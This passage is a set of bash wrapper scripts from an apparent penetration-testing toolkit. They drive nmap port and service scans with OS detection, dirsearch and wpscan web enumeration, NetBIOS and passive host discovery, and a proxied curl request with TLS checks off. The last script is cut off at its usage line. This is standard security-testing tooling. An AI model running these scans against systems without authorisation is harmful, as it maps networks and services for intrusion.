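# listing); restore it from the repository before relying on the output.
nmap -oX - -sU --top-ports "$1" 2>/dev/null | grep 'services=' | sed 's/||g'

--------------------------------------------------------------------------------
/port-scanning/tcp/services/tcp-ports-services-scan-top400-noping.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Usage: tcp-ports-services-scan-top400-noping.sh <target>
# SYN scan of the 400 most common TCP ports with version and OS detection,
# host discovery skipped (-Pn). Results go to tcp_services_400_<target>.* (-oA).

# The SYN scan (-sS) and OS detection (-O) need raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1
# A CIDR range contains '/', which would turn the -oA basename into a path
# below a directory that does not exist; map it to '_' for the file name only.
out_base="tcp_services_400_${target//\//_}"

# Quoted so the target reaches nmap as exactly one argument.
nmap -sS -sV -vv -O --osscan-guess --version-all -Pn --top-ports 400 --open -T4 \
  -oA "$out_base" "$target"

--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-slow-noping-nodns.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Usage: tcp-ports-scan-top1000-slow-noping-nodns.sh <target>
# SYN scan of the 1000 most common TCP ports without host discovery (-Pn) or
# DNS resolution (-n), one second between probes and a 30 minute per-host
# timeout. Results go to tcp_ports_1000_<target>.* (-oA).

# The SYN scan (-sS) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1
# Keep a CIDR '/' out of the output file name (it would be read as a path).
out_base="tcp_ports_1000_${target//\//_}"

nmap -sS -n -Pn -vv --top-ports 1000 --reason --open --host-timeout 30m --scan-delay 1s \
  -oA "$out_base" "$target"

--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-suprt-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2023 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Usage: tcp-ports-scan-top1000-suprt-fast-noping-nodns.sh <target>
# SYN scan of the 1000 most common TCP ports without host discovery (-Pn) or
# DNS resolution (-n), using the -T4 timing template.
# Results go to tcp_ports_1000_<target>.* (-oA).

# The SYN scan (-sS) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1
# Keep a CIDR '/' out of the output file name (it would be read as a path).
out_base="tcp_ports_1000_${target//\//_}"

nmap -sS -n -Pn -vv --top-ports 1000 --open --reason -T4 --defeat-rst-ratelimit \
  -oA "$out_base" "$target"

--------------------------------------------------------------------------------
/port-scanning/udp/services/udp-services-scan-noping.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.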
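#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Usage: udp-services-scan-noping.sh <target> <ports>
#   <ports> is a comma-separated list handed to nmap's -p option.
# UDP scan of the listed ports with -A detection, host discovery skipped (-Pn).
# Results go to udp_services_<target>.* (-oA).

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Misuse is reported on stderr with a non-zero status, like the root check.
if [[ $# -ne 2 ]]; then
  echo "Please provide the target IP address or an IP range and the open UDP ports separated by comma." 1>&2
  exit 1
fi

target=$1
ports=$2
# A CIDR range contains '/', which would turn the -oA basename into a path
# below a directory that does not exist; map it to '_' for the file name only.
out_base="udp_services_${target//\//_}"

# Quoted so target and port list each reach nmap as exactly one argument.
nmap -sU -vv -A --osscan-guess --version-all -Pn -p"$ports" -oA "$out_base" "$target"

--------------------------------------------------------------------------------
/port-scanning/tcp/services/tcp-services-scan-noping.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2021 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.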
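See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Usage: tcp-services-scan-noping.sh <target> <ports>
#   <ports> is a comma-separated list handed to nmap's -p option.
# SYN scan of the listed ports with -A detection, host discovery skipped (-Pn).
# Results go to tcp_services_<target>.* (-oA).

# The SYN scan (-sS) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Misuse is reported on stderr with a non-zero status, like the root check.
if [[ $# -ne 2 ]]; then
  echo "Please provide the target IP address or an IP range and the open TCP ports separated by comma." 1>&2
  exit 1
fi

target=$1
ports=$2
# A CIDR range contains '/', which would turn the -oA basename into a path
# below a directory that does not exist; map it to '_' for the file name only.
out_base="tcp_services_${target//\//_}"

# Quoted so target and port list each reach nmap as exactly one argument.
nmap -sS -vv -A --osscan-guess --version-all -Pn -p"$ports" -oA "$out_base" "$target"

--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000-super-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Usage: udp-ports-scan-top1000-super-fast-noping-nodns.sh <target>
# UDP scan of the 1000 most common ports without host discovery (-Pn) or DNS
# resolution (-n), using the -T4 timing template.
# Results go to udp_ports_top1000_<target>.* (-oA).

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1
# Keep a CIDR '/' out of the output file name (it would be read as a path).
out_base="udp_ports_top1000_${target//\//_}"

nmap -sU -n -Pn -vv --top-ports 1000 --reason --open --defeat-icmp-ratelimit -T4 \
  -oA "$out_base" "$target"

--------------------------------------------------------------------------------
/web/dir-scanner-dirsearch-big.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Usage: dir-scanner-dirsearch-big.sh <url>
# Runs dirsearch against <url> with the seclists big.txt wordlist and writes a
# plain-text report named after the URL into the current directory.

if [[ $# -ne 1 ]]; then
  echo "Please provide the target URL." 1>&2
  exit 1
fi

url=$1
# Report name: runs of '/' and '.' become '_', ':' is dropped, so the URL can
# never act as a path. A private variable is used instead of LOGNAME, which is
# the standard login-name environment variable and would be passed on, changed,
# to dirsearch.
report_file=$(printf '%s\n' "dirsearch_${url}" \
  | sed -r -e 's/[/]+/_/g' -e 's/[.]+/_/g' -e 's/[:]+//g')
report_file="${report_file}.txt"

# Quoted so a URL with '&', '?' or spaces reaches dirsearch as one argument.
dirsearch -b -u "$url" -t 16 -r -E -f \
  -w /usr/share/seclists/Discovery/Web-Content/big.txt \
  --plain-text-report="$report_file"

--------------------------------------------------------------------------------
/port-scanning/udp/services/udp-services-fast-scan-noping.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Usage: udp-services-fast-scan-noping.sh <target> <ports>
#   <ports> is a comma-separated list handed to nmap's -p option.
# UDP scan of the listed ports with -A detection and -T4 timing, host discovery
# skipped (-Pn). Results go to udp_services_<target>.* (-oA).

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

if [[ $# -ne 2 ]]; then
  echo "Please provide the target IP address or an IP range and the open UDP ports separated by comma." 1>&2
  exit 1
fi

target=$1
ports=$2
# Keep a CIDR '/' out of the output file name (it would be read as a path).
out_base="udp_services_${target//\//_}"

nmap -sU -vv -A --osscan-guess --version-all -Pn -p"$ports" -T4 -oA "$out_base" "$target"

--------------------------------------------------------------------------------
/reconnaissance/hostname.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.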
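#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Usage: hostname.sh <ip>
# Prints "<ip> <names...>" from an nslookup of the address and appends the
# names (not the address) to ip_hostname_<ip with / and . as _>.txt.

# Misuse is reported on stderr with a non-zero status.
if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address." 1>&2
  exit 1
fi

ip=$1
# A private variable is used instead of LOGNAME, which is the standard
# login-name environment variable and would be passed on, changed, to the
# child processes.
log_file=$(printf '%s\n' "ip_hostname_${ip}" | sed -r -e 's/[/]+/_/g' -e 's/[.]+/_/g')
log_file="${log_file}.txt"

printf '%s ' "$ip"
# The last sed joins all answer lines into one space-separated line.
nslookup "$ip" | grep 'name' | cut -f2 | sed 's/name = //' | sed ':a;N;$!ba;s/\n/ /g' | tee -a "$log_file"
echo

--------------------------------------------------------------------------------
/web/dir-scanner-dirsearch-medium.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.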
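#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Usage: dir-scanner-dirsearch-medium.sh <url>
# Runs dirsearch against <url> with the dirbuster medium wordlist and writes a
# plain-text report named after the URL into the current directory.

# Misuse is reported on stderr with a non-zero status.
if [[ $# -ne 1 ]]; then
  echo "Please provide the URL." 1>&2
  exit 1
fi

url=$1
# Report name: runs of '/' and '.' become '_', ':' is dropped, so the URL can
# never act as a path. A private variable is used instead of LOGNAME, which is
# the standard login-name environment variable and would be passed on, changed,
# to dirsearch.
report_file=$(printf '%s\n' "dirsearch_${url}" \
  | sed -r -e 's/[/]+/_/g' -e 's/[.]+/_/g' -e 's/[:]+//g')
report_file="${report_file}.txt"

# Quoted so a URL with '&', '?' or spaces reaches dirsearch as one argument.
dirsearch -b -u "$url" -t 16 -r -E -f \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  --plain-text-report="$report_file"

--------------------------------------------------------------------------------
/live-hosts/discover-local-live-hosts-passively-p0f.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2019 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .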
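#
# For more see the file 'LICENSE' for copying permission.



# Usage: discover-local-live-hosts-passively-p0f.sh <interface>
# Runs p0f on the given network interface and writes its output to
# local_live_hosts_p0f_<interface>.txt in the current directory.

# Despite the wording of the message, a non-root caller is refused.
if [[ $EUID -ne 0 ]]; then
  echo "For better results, please run this script as root." 1>&2
  exit 1
fi

# Misuse is reported on stderr with a non-zero status, like the root check.
if [[ $# -ne 1 ]]; then
  echo "Please provide your network device." 1>&2
  exit 1
fi

iface=$1
# A private variable is used instead of LOGNAME, which is the standard
# login-name environment variable and would be passed on, changed, to p0f.
# '/' is mapped to '_' so the argument cannot redirect the log to another path.
log_file=$(printf '%s\n' "local_live_hosts_p0f_${iface}.txt" | sed -r 's/[/]+/_/g')

p0f -i "$iface" > "$log_file"


--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-delay-sequential.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Usage: tcp-ports-scan-full-delay-sequential.sh <target> <scan-delay>
# SYN scan of all TCP ports (-p-) in sequential order (-r) with the given delay
# between probes. Results go to tcp_ports_full_delay_sequential_<target>.* (-oA).

# The SYN scan (-sS) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

if [[ $# -ne 2 ]]; then
  echo "Please provide the target IP address or an IP range and the scan delay time(seconds)." 1>&2
  exit 1
fi

target=$1
delay=$2
# Keep a CIDR '/' out of the output file name (it would be read as a path).
out_base="tcp_ports_full_delay_sequential_${target//\//_}"

# Quoted so target and delay each reach nmap as exactly one argument.
nmap -sS -vv -r -p- --reason --open --scan-delay "$delay" -oA "$out_base" "$target"

--------------------------------------------------------------------------------
/port-scanning/tcp/services/tcp-services-fast-scan-noping.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2023 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Usage: tcp-services-fast-scan-noping.sh <target> <ports>
#   <ports> is a comma-separated list handed to nmap's -p option.
# SYN scan of the listed ports with -A detection and -T4 timing, host discovery
# skipped (-Pn). Results go to tcp_services_<target>.* (-oA).

# The SYN scan (-sS) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

if [[ $# -ne 2 ]]; then
  echo "Please provide the target IP address or an IP range and the open TCP ports separated by comma." 1>&2
  exit 1
fi

target=$1
ports=$2
# Keep a CIDR '/' out of the output file name (it would be read as a path).
out_base="tcp_services_${target//\//_}"

nmap -sS -vv -A --osscan-guess --version-all -Pn -p"$ports" -T4 -oA "$out_base" "$target"

--------------------------------------------------------------------------------
/web/curl-get.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.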
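#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Sends one GET request through a proxy and prints the response with headers.
#
# e.g. $1 == Accept header
# e.g. $2 == Auth Cookie header
# e.g. $3 == proxy (http://127.0.0.1:8080)
# e.g. $4 == target url
#
# The cookie header is given on the command line, so it is visible in the
# process list and in shell history while and after the script runs.

# Misuse is reported on stderr with a non-zero status.
if [[ $# -ne 4 ]]; then
  echo "Please provide Accept header, authorization cookie, proxy server and target url." 1>&2
  exit 1
fi

accept_header=$1
cookie_header=$2
proxy=$3
url=$4

# --insecure turns off TLS certificate verification, which lets the request
# pass through an intercepting proxy; the server's identity is not checked.
curl -X GET \
  --header "$accept_header" \
  --header 'Accept-Language: en' \
  --header "$cookie_header" \
  -x "$proxy" \
  --insecure --include "$url"

--------------------------------------------------------------------------------
/grep/grep-list-hosts-and-open-ports-to-txt.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.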
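#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Usage: grep-list-hosts-and-open-ports-to-txt.sh <directory>
# Reads every *.gnmap file in <directory> and prints, per host, the host field,
# a port count and one "<port><TAB><service>" line per listed port.

# Misuse is reported on stderr with a non-zero status.
if [[ $# -ne 1 ]]; then
  echo "Please provide a directory path." 1>&2
  exit 1
fi

scan_dir=$1

# grep -E replaces the deprecated egrep; '--' and the quotes keep a directory
# name that starts with '-' or contains spaces from being misread.
# The awk program is unchanged. NOTE(review): its first printf builds the
# format string from $1 (the host field), so a '%' in that field would be read
# as a format directive.
grep -E -v -e "^#|Status: Up" -- "$scan_dir"/*.gnmap \
  | cut -d' ' -f2,4- \
  | sed 's/Ignored.*//g' \
  | awk '{printf "Host: " $1 "\nOpen ports: " NF-1 "\n"; $1=""; for(i=2; i<=NF; i++) { a=a""$i; }; split(a,s,","); for(e in s) { split(s[e],v,"/"); printf "%s\t%s\n", v[1], v[5]}; a=""; printf "\n"; }'

--------------------------------------------------------------------------------
/live-hosts/discover-local-live-hosts-netbios.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2019 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .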
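#
# For more see the file 'LICENSE' for copying permission.



# Usage: discover-local-live-hosts-netbios.sh <ip-range>
# Runs nbtscan -e over the range and writes its output to
# local_live_hosts_netbios_<range with / as _>.txt in the current directory.

# Despite the wording of the message, a non-root caller is refused.
if [[ $EUID -ne 0 ]]; then
  echo "For better results, please run this script as root." 1>&2
  exit 1
fi

# Misuse is reported on stderr with a non-zero status, like the root check.
if [[ $# -ne 1 ]]; then
  echo "Please provide a target ip range." 1>&2
  exit 1
fi

range=$1
# A private variable is used instead of LOGNAME, which is the standard
# login-name environment variable and would be passed on, changed, to nbtscan.
# '/' (as in a CIDR range) is mapped to '_' so the name stays a plain file.
log_file=$(printf '%s\n' "local_live_hosts_netbios_${range}.txt" | sed -r 's/[/]+/_/g')

nbtscan -e "$range" > "$log_file"



--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-delay-sequential-noping.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Usage: tcp-ports-scan-full-delay-sequential-noping.sh <target> <scan-delay>
# SYN scan of all TCP ports (-p-) in sequential order (-r) with the given delay
# between probes, host discovery skipped (-Pn).
# Results go to tcp_ports_full_delay_sequential_<target>.* (-oA).

# The SYN scan (-sS) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

if [[ $# -ne 2 ]]; then
  echo "Please provide the target IP address or an IP range and the scan delay time(seconds)." 1>&2
  exit 1
fi

target=$1
delay=$2
# Keep a CIDR '/' out of the output file name (it would be read as a path).
out_base="tcp_ports_full_delay_sequential_${target//\//_}"

# Quoted so target and delay each reach nmap as exactly one argument.
nmap -sS -vv -r -p- --reason -Pn --open --scan-delay "$delay" -oA "$out_base" "$target"

--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full-super-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Usage: udp-ports-scan-full-super-fast-noping-nodns.sh <target>
# UDP scan of all ports (-p-) without host discovery (-Pn) or DNS resolution
# (-n), using the -T4 timing template. Results go to udp_ports_full_<target>.*.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1
# Keep a CIDR '/' out of the output file name (it would be read as a path).
out_base="udp_ports_full_${target//\//_}"

nmap -sU -n -Pn -vv -p- --reason --open --defeat-icmp-ratelimit -T4 \
  -oA "$out_base" "$target"

--------------------------------------------------------------------------------
/web/wordpress-scan.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.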
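#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Usage: wordpress-scan.sh <url>
# Runs wpscan against <url> and copies its output (stdout and stderr) to a
# text file named after the URL in the current directory.

# Misuse is reported on stderr with a non-zero status.
if [[ $# -ne 1 ]]; then
  echo "Please provide the URL." 1>&2
  exit 1
fi

url=$1
# Log name: runs of '/' and '.' become '_', ':' is dropped, so the URL can
# never act as a path. A private variable is used instead of LOGNAME, which is
# the standard login-name environment variable and would be passed on, changed,
# to wpscan.
log_file=$(printf '%s\n' "wpscan_${url}" \
  | sed -r -e 's/[/]+/_/g' -e 's/[.]+/_/g' -e 's/[:]+//g')
log_file="${log_file}.txt"

# Quoted so a URL with '&', '?' or spaces reaches wpscan as one argument.
wpscan -v --url "$url" --update -e vp,vt,tt,cb,dbe,u,m \
  --plugins-detection aggressive --plugins-version-detection aggressive \
  -f cli-no-color 2>&1 | tee "$log_file"

--------------------------------------------------------------------------------
/web/eyewitness.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2023 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.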
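#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.



# Usage: eyewitness.sh <url-file> <report-dir> <user-agent>
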